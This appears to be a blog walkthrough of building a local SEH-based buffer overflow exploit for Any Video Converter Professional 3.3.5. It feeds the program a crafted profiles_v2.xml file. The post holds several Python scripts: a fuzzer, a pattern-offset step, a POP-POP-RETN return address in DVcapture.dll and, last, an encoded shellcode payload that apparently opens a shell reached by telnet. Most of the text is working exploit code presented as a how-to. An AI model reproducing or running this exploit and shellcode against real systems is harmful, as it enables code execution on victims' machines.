In this time I try to exploit an application Any Video Converter Professional V 3.3.5 via local exploit.
- The first I make a fuzzer like below
#!usr/bin/pythonRun the fuzzer to make file, and then replace on application directory. Afterthat open application with olly dbg then press Shift+F9 to see the effect
file="profiles_v2.xml"
dead="\x41" * 2000
poc="<root>\n"
poc=poc + "<categories>\n"
poc=poc + "<category name=\"" + dead + "\" id=\"0\" icon=\"cat_all.bmp\" desc=\"All Profiles\"/>\n"
poc=poc + "</categories>\n"
poc=poc + "<groups></groups>\n<profiles></profiles>\n</root>\n"
writeFile = open (file, "w")
writeFile.write( poc )
writeFile.close()
print "Success Creating File"
application crashes, then view SEH chain
Success overwrite SEHandler
The next press Shift+F9 to overwrite EIP
- Second, looking for modules that load by application. In here I found and use DVcapture.dll. Then check the modules using msfpescan
Like the previous case, this step aimed to see if the module that contain value 0x0400 or not in module. Ok, the module can be used for stepping stone.
Then search the command POP, POP, RETN on this module.
We can see, the address not contain character 00,0a,0d.
- Next create a pattern and attach on fuzzer
#!usr/bin/python
file="profiles_v2.xml"
dead="Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co"
poc="<root>\n"
poc=poc + "<categories>\n""
poc=poc + "<category name=\"" + dead + "\" id=\"0\" icon=\"cat_all.bmp\" desc=\"All Profiles\"/>\n"
poc=poc + "</categories>\n"
poc=poc + "<groups></groups>\n<profiles></profiles>\n</root>\n"
writeFile = open (file, "w")
writeFile.write( poc )
writeFile.close()
print "Success Creating File"
Write the EIP address on above, then count with pattern_offset
Put the offset on fuzzer
#!usr/bin/python
file="profiles_v2.xml"
dead ="\x41" * 328
dead+="\xcc\xcc\xcc\xcc"
dead+="\x41\x41\x41\x41"
dead+="\x90" * (336 - len(dead))
poc="<root>\n"
poc=poc + "<categories>\n"
poc=poc + "<category name=\"" + dead + "\" id=\"0\" icon=\"cat_all.bmp\" desc=\"All Profiles\"/>\n"
poc=poc + "</categories>\n"
poc=poc + "<groups></groups>\n<profiles></profiles>\n</root>\n"
writeFile = open (file, "w")
writeFile.write( poc )
writeFile.close()
print "Success Creating File"
it be can certained the count is correct
- Next step is controlling CPU process with enter the alamat POP, POP, RETN to fuzzer
- Then generate the payload and attach to fuzzer
#!usr/bin/pythonAfterthat, open the application without olly dbg
file="profiles_v2.xml"
dead ="\x41" * 328
dead+="\xeb\x06\x90\x90"
dead+="\x77\xC1\x01\x10"
dead+=("\xbe\x1b\x3f\xa3\x3e\x31\xc9\xb1\x51\xdb\xcd\xd9\x74\x24\xf4\x5a"
"\x31\x72\x0e\x83\xea\xfc\x03\x69\x35\x41\xcb\x71\x23\x6e\x79\x61"
"\x4d\x8f\x7d\x8e\xce\xfb\xee\x54\x2b\x77\xab\xa8\xb8\xfb\x31\xa8"
"\xbf\xec\xb1\x07\xd8\x79\x9a\xb7\xd9\x96\x6c\x3c\xed\xe3\x6e\xac"
"\x3f\x34\xe9\x9c\xc4\x74\x7e\xdb\x05\xbe\x72\xe2\x47\xd4\x79\xdf"
"\x13\x0f\xaa\x6a\x79\xc4\xf5\xb0\x80\x30\x6f\x33\x8e\x8d\xfb\x1c"
"\x93\x10\x17\xa1\x87\x99\x6e\xc9\xf3\x81\x11\xd2\xcd\x62\xb5\x5f"
"\x6e\xa5\xbd\x1f\x7d\x4e\xb1\x83\xd0\xdb\x72\xb3\x74\xb4\xfc\x8d"
"\x86\xa8\x51\xee\x41\x56\x01\x76\x06\xa4\x97\x1e\xa1\xb9\xe5\x81"
"\x19\xc1\xda\x55\x69\xd0\x27\x9e\x3d\xd4\x0e\xbf\x34\xcf\xc9\xbe"
"\xaa\x18\x14\x95\x5e\x1b\xe7\xc5\xf7\xc2\x1e\x10\xaa\xa2\xdf\x0c"
"\xe6\x1f\x73\xe3\x5a\xe3\x21\x40\x0e\x1c\x16\x22\xd8\xf3\xcb\xca"
"\x4b\x7d\x12\x87\x04\xd9\xcf\xd7\x13\x76\x0f\xc1\xf6\x69\xbe\xb8"
"\xf9\x5a\x28\xe6\xab\x75\x40\xb1\x4c\x5f\xc1\x68\x4c\xb0\x8e\x77"
"\xfb\xb7\x06\x24\x03\x61\xc8\x9a\xaf\xdb\x16\xf2\xc3\x8c\x0f\x8b"
"\x25\x35\x87\x94\x7c\x93\xd8\xba\xe7\x76\x43\x5c\x80\xe5\xe6\x29"
"\xb5\x80\xa8\x70\x1f\x99\xc0\x65\x35\x65\x5a\x8b\xfb\xa5\xaf\xe1"
"\x02\x67\x7d\x0b\xb8\x44\xee\x7e\x47\xad\xbb\x2b\x13\xa5\xc9\xd5"
"\xd7\x25\xd1\x5c\x5c\xb2\xfb\xc5\x0b\x1e\x55\xa8\xe2\xf4\x54\x1b"
"\x54\x5c\x06\x64\x86\x36\x05\x43\x22\x09\x06\x8c\xfb\xff\x56\x8d"
"\x33\xff\x79\xfa\x6b\x03\xfa\x38\xf7\x04\x2b\x92\x07\x2a\xbc\x6c"
"\x22\x29\x4e\xc3\x2f\x78\x4e\x33")
dead+="\x90" * (336 - len(dead))
poc="<root>\n"
poc=poc + "<categories>\n"
poc=poc + "<category name=\"" + dead + "\" id=\"0\" icon=\"cat_all.bmp\" desc=\"All Profiles\"/>\n"
poc=poc + "</categories>\n"
poc=poc + "<groups></groups>\n<profiles></profiles>\n</root>\n"
writeFile = open (file, "w")
writeFile.write( poc )
writeFile.close()
print "Success Creating File"
And then press command telnet
Success, alhamdulillah ^^
No comments:
Post a Comment